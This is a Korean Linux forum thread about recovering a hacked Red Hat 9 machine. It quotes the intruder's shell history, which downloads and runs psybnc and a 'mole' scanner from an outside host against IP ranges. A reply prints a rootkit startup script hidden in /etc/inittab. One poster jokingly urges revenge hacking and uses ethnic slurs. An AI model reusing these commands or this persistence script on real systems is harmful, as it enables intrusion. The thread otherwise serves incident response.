시스템 해킹 당했습니다. 조치 방법을 좀 알려주세요. psybnc, m
안녕하세요. 집에서 리눅스 공부하려고, 유동아이피를 고정아이피로 바꿔주는 사이트에 질문을 올렸다가, 그 다음날 제 리눅스 피씨가 크래킹을 당한 것 같습니다.
지금 증상은, top 과 같은 명령어를 실행 했을 때, 다음과 같이 나옵니다.[root@---- root]# top
top: error while loading shared libraries: libncurses.so.4: cannot open shared object file: No such file or directory
그리고 원래, 래드헷 깔때, 방화벽 보안 설정을 high로 해서 깔아서 텔넷이 안돼야 하는데, nmap돌려 보면, 다음과 같이 나옵니다
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (218.$.$.$):
(The 1595 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
23/tcp open telnet
53/tcp open domain
110/tcp open pop-3
111/tcp open sunrpc
1025/tcp open NFS-or-IIS
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
[root@---- root]#
그리고 다른 컴퓨터에서 그냥 telnet으로 제 컴에 접속하면 ssh모드로 떨어집니다.
c:\> telnet AAA.BBB.CC.D
ssh-1.5-1.2.25
단서라고 할 만한 것은, 그 침입한 넘이, 아래와 같은 명령어를 시행한 것이
남아 잇었습니다. 그런데 무슨 짓을 한 것인지 잘 모릅니다.
[root@--- root]# export PATH="."
[root@--- root]# sh
[root@--- root]# exit
[root@--- root]# cd /tmp
[root@--- root]# ls
[root@--- root]# cd " "
[root@--- root]# wget
earth.prohosting.com/xc3te/up/psy.tgz
[root@--- root]# tar xzvf psy.tgz
[root@--- root]# cd psybnc
[root@--- root]# mv psybnc sh
[root@--- root]# bash
[root@--- root]# exit
[root@--- root]# w
[root@--- root]# cd /tmp
[root@--- root]# cd mole
[root@--- root]# ./mazz 61.1
[root@--- root]# ./mazz 61.197
[root@--- root]# w
[root@--- root]# cd /tmp
[root@--- root]# rm -rf " "
[root@--- root]# cd /tmp
[root@--- root]# wget earth.prohosting.com/xc3te/up/mole.tgz
[root@--- root]# tar xzvf mole.tgz
[root@--- root]# cd mole
[root@--- root]# ./mazz 80.54
[root@--- root]# ./mazz 200.210
***지금 그렇게 중요한 자료들이 들어 있지는 않습니다. 싹 밀어버리고 다시 깔수도 있지만, 다음에 또 해킹 당하질 말라는 법이 없으니 조치 방법을 알고 싶습니다. 일단은 /tmp 폴더 안에 그넘이 풀어 놓은 디렉토리들은 다 지웠습니다. 그래도 계속 텔넷포트가 열려있고 막을 수 있는 방법도 모르겠네요.
/etc/xinetd.d/ 폴더 안에는 telnet이라는 파일도 없거든요.
어디서 봤는데, root 계정 명령어를 원상태로 복구하는 법이 아래와 같다고 해서 해봤는데, 그것도 안돼네요. 이거라도 되었으면 하는데,,, 여러 고수님들의 관심 부탁드립니다.
[root@--- root]# rpm -Uvh procps-2.0.11-6.i386.rpm --force --nodeps
경고: procps-2.0.11-6.i386.rpm: V3 DSA signature: NOKEY, key ID db42a60e
준비 중... ########################################### [100%]
1:procps ########################################### [100%]
오류: 아카이브를 푸는데 실패함 다음 파일의 /bin/ps: cpio: rename 실패함 - 명령이 허용되지 않음
[root@--- root]#
혹시나 프로세서 보시면 감 잡히는거 있으실까 해서....
[root@--- root]# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1380 144 ? S Feb10 0:04 init
root 2 0.0 0.0 0 0 ? SW Feb10 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Feb10 0:00 [kapmd]
root 4 0.0 0.0 0 0 ? SWN Feb10 0:00 [ksoftirqd_CPU0]
root 9 0.0 0.0 0 0 ? SW Feb10 0:00 [bdflush]
root 5 0.0 0.0 0 0 ? SW Feb10 0:05 [kswapd]
root 6 0.0 0.0 0 0 ? SW Feb10 0:00 [kscand/DMA]
root 7 0.0 0.0 0 0 ? SW Feb10 0:51 [kscand/Normal]
root 8 0.0 0.0 0 0 ? SW Feb10 0:00 [kscand/HighMem]
root 10 0.0 0.0 0 0 ? SW Feb10 0:00 [kupdated]
root 11 0.0 0.0 0 0 ? SW Feb10 0:00 [mdrecoveryd]
root 15 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 73 0.0 0.0 0 0 ? SW Feb10 0:00 [khubd]
root 218 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 219 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 220 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 221 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 222 0.0 0.0 0 0 ? SW Feb10 0:00 [kjournald]
root 495 0.0 0.0 0 0 ? SW Feb10 0:00 [eth0]
root 545 0.0 0.3 1972 488 ? S Feb10 0:02 /sbin/dhclient -1
root 614 0.0 0.0 0 0 ? SW Feb10 0:00 [eth1]
root 667 0.0 0.0 1440 120 ? S Feb10 0:00 syslogd -m 0
root 671 0.0 0.0 1364 40 ? S Feb10 0:00 klogd -x
rpc 680 0.0 0.0 1544 0 ? SW Feb10 0:00 [portmap]
rpcuser 699 0.0 0.0 1612 0 ? SW Feb10 0:00 [rpc.statd]
root 767 0.0 0.0 1364 4 ? S Feb10 0:00 /usr/sbin/apmd -p
root 804 0.0 0.1 3504 228 ? S Feb10 0:00 /usr/sbin/sshd
root 837 0.0 0.3 5936 396 ? S Feb10 0:00 [sendmail]
smmsp 846 0.0 0.2 5728 328 ? S Feb10 0:00 [sendmail]
root 856 0.0 0.0 1412 68 ? S Feb10 0:00 gpm -t imps2 -m /
root 865 0.0 0.1 1412 128 ? S Feb10 0:00 crond
root 876 0.0 0.2 7508 324 ? S Feb10 0:00 cupsd
xfs 940 0.0 0.2 4740 324 ? S Feb10 0:00 [xfs]
daemon 958 0.0 0.1 1412 160 ? S Feb10 0:00 [atd]
named 983 0.0 0.9 29720 1252 ? S Feb10 0:00 [named]
root 2564 0.0 0.0 2024 4 ? S Feb10 0:00 xinetd -stayalive
root 2568 0.0 0.0 1348 4 tty3 S Feb10 0:00 /sbin/mingetty tt
root 2573 0.0 0.0 1348 4 tty6 S Feb10 0:00 /sbin/mingetty tt
root 2574 0.0 0.0 1344 4 tty5 S Feb10 0:00 /sbin/mingetty tt
root 2575 0.0 0.0 1348 4 tty4 S Feb10 0:00 /sbin/mingetty tt
root 2576 0.0 0.0 1348 4 tty2 S Feb10 0:00 /sbin/mingetty tt
root 11340 0.0 0.2 2608 336 ? S 00:08 0:00 [fam]
root 11466 0.0 0.0 1704 80 ? S 00:23 0:00 esd -terminate -n
root 12559 0.0 1.3 6776 1712 ? S 14:52 0:01 /usr/sbin/sshd
root 12561 0.0 1.1 5440 1452 pts/0 S 14:52 0:01 -bash
root 12598 0.0 0.3 1348 396 tty1 S 14:52 0:00 /sbin/mingetty tt
:?
바이너리들이 변경 되었는가보네요 ps 같은것은 프로세스등을 숨기려고 바꿈
바이너리들이 변경 되었는가보네요 ps 같은것은 프로세스등을 숨기려고 바꿈니다. 그냥 스크립트 키드인것 같습니다.
적절히 그냥 다시 설치 하시고 패키지와 set 퍼미션만 막으시면 무난하실듯 보입니다.
Re: 시스템 해킹 당했습니다. 조치 방법을 좀 알려주세요. psybn
배포판 자체의 버젼이 낮으신 듯 합니다.(ssh1??)
최신 배포판..(debian sid 같은..?)으로 다시 설치하시고..
꾸준히 보안 패치 해주심이..다시까시고 힘내시길...
http://redage.net
lsattr로 안지워지는 파일의 속성을 보세요.chattr로 바뀌면
lsattr로 안지워지는 파일의 속성을 보세요.
chattr로 바뀌면 좋은 것이고,
그리고 먼저 네트웍 포트를 빼버리시고 작업하세요.. 텔넷 포트가 열려있다고 하시니 언제 들어올 지 모르지않아요?
포트 열린 것과 그 프로그램을 보려면 netstat -anlp 정도로 보시면 될 것 같습니다.
rommance.net
레드헷9 를 깔았구요. openssh-server-3.5p1-6 라고
레드헷9 를 깔았구요. openssh-server-3.5p1-6 라고 깔려 있습니다. 아마도 행킹한넘이 들와서 새로 설치(?)한 ssh가 ssh-1.5-1.2.25 인것 같기도 하네요.
[root@--- root]# rpm -qa | grep ssh
openssh-3.5p1-6
openssh-server-3.5p1-6
openssh-clients-3.5p1-6
openssh-askpass-3.5p1-6
openssh-askpass-gnome-3.5p1-6
좌우명 ;-)
명상-> 空.
리눅스-> 구루.
중요한 자료가 있으시다면 백업하시고..새로 까시길 권장합니
중요한 자료가 있으시다면 백업하시고..
새로 까시길 권장합니다..
새로 까시고
rhn_register
up2date -u
로 바로 최신버젼으로 업데이트를 하는게 좋겠군요 ;)
오랫동안 꿈을 그리는 사람은 그 꿈을 닮아간다...
http://mytears.org ~(~_~)~
나 한줄기 바람처럼..
[root@xxxxx bin]# lsattr topsuS-iadAc-
[root@xxxxx bin]# lsattr top
suS-iadAc---- top
[root@garam21 bin]# chattr top
Must use '-v', =, - or +
[root@xxxxx bin]# chattr -i top
[root@xxxxx bin]# lsattr top
suS--adAc---- top
[root@xxxxx bin]# rm top
rm: remove 일반 파일 `top'? y
rm: cannot remove `top': 명령이 허용되지 않음
[root@xxxxx bin]# chattr -suS top
[root@xxxxx bin]# lsattr top
-----adAc---- top
[root@xxxxx bin]# chattr -adAc top
[root@xxxxx bin]# lsattr top
------------- top
[root@xxxxx bin]# rm top
rm: remove 일반 파일 `top'? y
[root@xxxxx bin]#
송지석님께서 알려주신 대로 lsattr, chattr의 명령으로 변경된 속성을 제거해 보았습니다. 결국 top을 지우고 다른 서버에서 하나 복사해다가 붙여넣기 해서 top은 살렸습니다.
다른 것들도 퍼미션이 변경되어 있네요. ㅡ.ㅡ;
[root@xxxxx bin]# pwd
/usr/bin
[root@xxxxx bin]# lsattr
suS-iadAc---- ./find
s---ia------- ./dir
suS-iadAc---- ./updatedb
suS-iadAc---- ./locate
suS-iadAc---- ./slocate
------------- ./kedit
------------- ./kfloppy
------------- ./khexedit
------------- ./kjots
------------- ./kwikdisk
------------- ./ksim
------------- ./ktimer
------------- ./odbcinst
------------- ./screen
좌우명 ;-)
명상-> 空.
리눅스-> 구루.
왠만하면요..시스템 건드리지 마시고요..조용히 파워 끄세요..
왠만하면요..
시스템 건드리지 마시고요..
조용히 파워 끄세요..
그리고는 귀찮으시더라도, 수사대에 고소하세요..
그럼 분석해서.. 잡아들일겁니다.
그런 사람들은 혼나야하니까요..
좀 귀찬으시더라도, 그런 법적인 경험을 해보시는게..
좋을거 같아요.. 서로서로를 위해..
그럼.. ^^
힘내세요.
우선 ftp데몬과 smb데몬을 닫으시기 바랍니다.중요화일을 백업하
우선 ftp데몬과 smb데몬을 닫으시기 바랍니다.
중요화일을 백업하신 다음 다시 설치하시길 바랍니다.
무한한 상상력과 강한실행욕구는 엔지니어의 마지막 무기~
사무실 공유기로 쓰던 데비안 리눅스...
매일 apt-get update && apt-get -y upgrade 되고 있어서
안심하고 있던 박스입니다.
간만에 디렉토리 정리나 할겸해서 필요없는 디렉토리 지우던 중에
backup:/usr/local# rm -rf jeus42
rm: cannot remove directory `jeus42': Operation not permitted
이런 현상을 보였습니다.
이때부터 뭐가 이상하다 싶어서 chkrootkit 을 돌려보니
last 결과에 2월10일 새벽시간에 외국에서 로긴한 흔적이 있었습니다.
그 계정은 테스트 한다고 만들어둔 school 이라는 계정인데 비번이 아이디랑 같았답니다.
이때부터 숨은넘 찾느라고 한참 들여다 보았습니다.
/etc/inittab 마지막줄에
저걸 주석처리 하고 dyno 란 파일을 보니 쉘스크립트인데..
#!/bin/sh if [ -x /etc/locale/cs/.LC/xfs ]; then p=`pwd` cd /etc/locale/cs/.LC/ export PBACK=$PATH export PATH=/etc/locale/cs/.LC/ xfs 1>/dev/null 2>/dev/null export PATH=$PBACK cd $p fi if [ -x /usr/local/games/.sh/shh ]; then p=`pwd` cd /usr/local/games/.sh/ export PBACK=$PATH export PATH=/usr/local/games/.sh/shh shh 1>/dev/null 2>/dev/null export PATH=$PBACK cd $p fi if [ -d /etc/locale/cs/swd/ ]; then p=`pwd` cd /etc/locale/cs/swd/ export PBACK=$PATH export PATH=/etc/locale/cs/swd [keventd] 1>/dev/null 2>/dev/null export PATH=$PBACK cd $p fi if [ -x /usr/bin/kflush ]; then kflush >/dev/null 2>/dev/null 3>/dev/null kflush p 1 >/dev/null 2>/dev/null 3>/dev/null kflush i `/sbin/pidof xfs` 1>/dev/null 2>/dev/null 3>/dev/null kflush i `/sbin/pidof shh` 1>/dev/null 2>/dev/null 3>/dev/null if [ -f /etc/locale/cs/swd/mech.pid ]; then f='cat /etc/locale/cs/swd/mech.pid' fi if [ -d /etc/locale/cs/swd/ ]; then k='/sbin/pidof [keventd]' kflush i $f 1>/dev/null 2>/dev/null 3>/dev/null kflush i $k 1>/dev/null 2>/dev/null 3>/dev/null kflush i $k 1>/dev/null 2>/dev/null 3>/dev/null fi fi저넘들 찾아서 모두 한곳으로 옮기고, 그 과정에 lsattr, chattr 남발하게 되었습니다.
/etc/locale/cs/.sniffer 에는 타이핑한 내용이 고스란히 남하 있네요 -_-;;
다행히 별로 로긴한 적이 없어서 오늘 들어가서 작업한 내용 뿐이어서
피해는 없을걸로..... 희망하고 있습니다.
lsof -n | grep keventd 해보니
이렇게 199.184.165.133:ircd (ESTABLISHED) 도 보입니다.
inittab 수정하고 /etc/rc{S,2,3}.d/* 살펴보고 날짜들 확인하고
리붓한 다음에는 정상적이네요.
apt-get install --reinstall fileutils ssh telnetd psmisc procps tcpd
생각나는데로 해주고 있는 중입니다.
비번도 왕창 바꾸고 -_-;;
[quote="jyj9782"]왠만하면요..시스템 건드리지 마시고요.
사이버 수사대에서 이런거도 해줘요? ㅡ,.ㅡ;;
----------------------------------------------------------------------------
ip 추적해보심이외국 쉐이들이 했다면 고소해도 소용없답니다.
ip 추적해보심이
외국 쉐이들이 했다면 고소해도 소용없답니다.
국내 사람이 하는 경우는 거의 드뭅니다.
제 경험상... 떼넘이나 양넘들이 많이 하더군요.
특히 떼넘들은 개념없이 마구 해대기 때문에 떼넘 ip라면
로그에 보이는 족족 ip가 속한 대역을 조사해서 전부 막아버리시는게 좋을겁니다.
만일 외국넘이고 분을 못참으시겠다면 크래킹 기술을 배워서 보복을 하심이 :evil:
(물론 법적인 뒷감당은 님이 하셔야겠죠)
Written By the Black Knight of Destruction
댓글 달기